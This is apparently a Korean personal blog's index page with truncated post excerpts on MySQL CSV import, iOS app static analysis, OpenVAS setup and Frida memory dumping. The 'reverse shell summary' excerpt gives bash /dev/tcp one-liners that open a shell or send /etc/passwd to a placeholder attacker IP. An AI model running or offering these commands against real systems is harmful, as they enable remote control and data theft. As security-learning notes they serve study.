All
-
mysql csv file importdevelopment/mysql 2020. 4. 9. 08:10
mysql table csv file import 시 table 구조와 csv file 구조가 동일할 때 아래와 같이 적용한다. /* table 구조 */ CREATE TABLE region ( id INT NOT NULL AUTO_INCREMENT, region_name VARCHAR(255) NOT NULL, ); /* csv file 구조 */ /* csv file format */ id,region_name 1,"Seoul" 2,"NewYork" 3,"jeju" 아래 명령어를 이용하여 적용 LOAD DATA INFILE '/tmp/data.csv' INTO TABLE region FIELDS TERMINATED BY ',' ENCLOSED BY '"' LINES TERMINATED BY '\n' ..
-
reverse shell summaryHack/No filtered 2020. 4. 8. 10:19
1. bash의 /dev/tcp 사용하기 쉘의 기본커맨드창에서 /dev/tcp를 이용하면 리버스쉘을 사용할 수 있다. 예로, cat /etc/passwd > /dev/tcp/공격자의 IP/PORT 이렇게하면 공격자의 IP/PORT로 /etc/passwd의 내용을 전달해준다. 응용하면 공격자에게 쉘까지 열어줄 수 있다. Cheat Sheet : /bin/sh >& /dev/tcp/Attacker_IP/PORT 0>&1 Cheat Sheet : bash -i >& /dev/tcp/Attacker_IP/PORT 0>&1 1: bash -i 2: >& /dev/tcp/Attacker_IP/PORT 3: 0>&1 bash -i는 bash shell을 대화형(interactive)모드로 사용하는 옵션이다. >& /..
-
ios 정적 분석 방법Hack/No filtered 2020. 4. 6. 10:47
1) 앱 설치 경로 파악 find / -name appname 2) 앱 복호화 clutch -d appname or number -> ipa 파일형태로 복호화됨 (그대로 ida에서 리버싱 가능) 3) ipa 파일 압축해제 unzip -d 압축풀경로 appname.ipa 4) 클래스정보 덤프 class-dump-z appname 5) objective-c 코드를 분석 진행 기타) 기본 명령어 otool (암호화된 앱인지 확인할 수 있음) .db 파일 검색 : find / -name *.db sqlite로 db 열어보기 : sqlite3 name.db -> .headers on -> .tables -> select * from table; plist 파일 xml로 변환 : plutil -convert xml..
-
openvas 설치 및 사용법Hack/No filtered 2020. 4. 6. 10:36
apt-get update && apt-get dist-upgrade -y reboot apt-get install openvas openvas-setup openvas-check-setup openvas-start openvasmd --user=admin --new-password= https://127.0.0.1:9392 advanced, confirm security exception 참고 : https://m.blog.naver.com/koromoon/221119393938
-
frida를 활용한 메모리 덤프Hack/Frida 2020. 4. 6. 10:17
1. pip install frida 2. https://github.com/frida/frida/releases 에서 frida-server-android-arm64 등을 다운로드 하여 디바이스에 전송 (adb push frida-server-arm64 /data/local/tmp) 3. chmod 777 frida-server-arm64 (실행 권한 부여) 4. ./frida-server-arm64 & (백그라운드 실행) : ps 로 실행여부 확인 5. cmd 창에서 frida-ps -U 입력 시 안드로이드 디바이스에서 처리되고 있는 ps 목록 확인 가능 6. fridump 다운로드 https://github.com/Nightbringer21/fridump 7. python fridump.py -u ..
-
Nox와 Frida 환경 구축Hack/Frida 2020. 4. 6. 10:15
1. 아나콘다 파이썬 환경 구축 - 파이썬 설치 (3.7.3) - 아나콘다 설치 (4.6.11) - 독립된 파이썬 환경 구축 $ conda create -n py3.7.3 python=3.7.3 -y - 독립된 파이썬 환경 지정 $ activate py3.7.3 2. 녹스 앱플레이어 설치 - 기본 root 설정 - 모바일설정 : 스마트폰, 그래픽 모드 : 스피드 - adb 환경변수 설정 (C:\Program Files\Nox\bin) 3. 프리다 설치 $ pip install Frida-tools frida 12.4.7 4. 프리다 서버 실행 - 안드로이드 운영체제 스펙 확인 $ adb shell $ getprop ro.product.cpu.abi - 프리다 서버 다운로드 (https://github.c..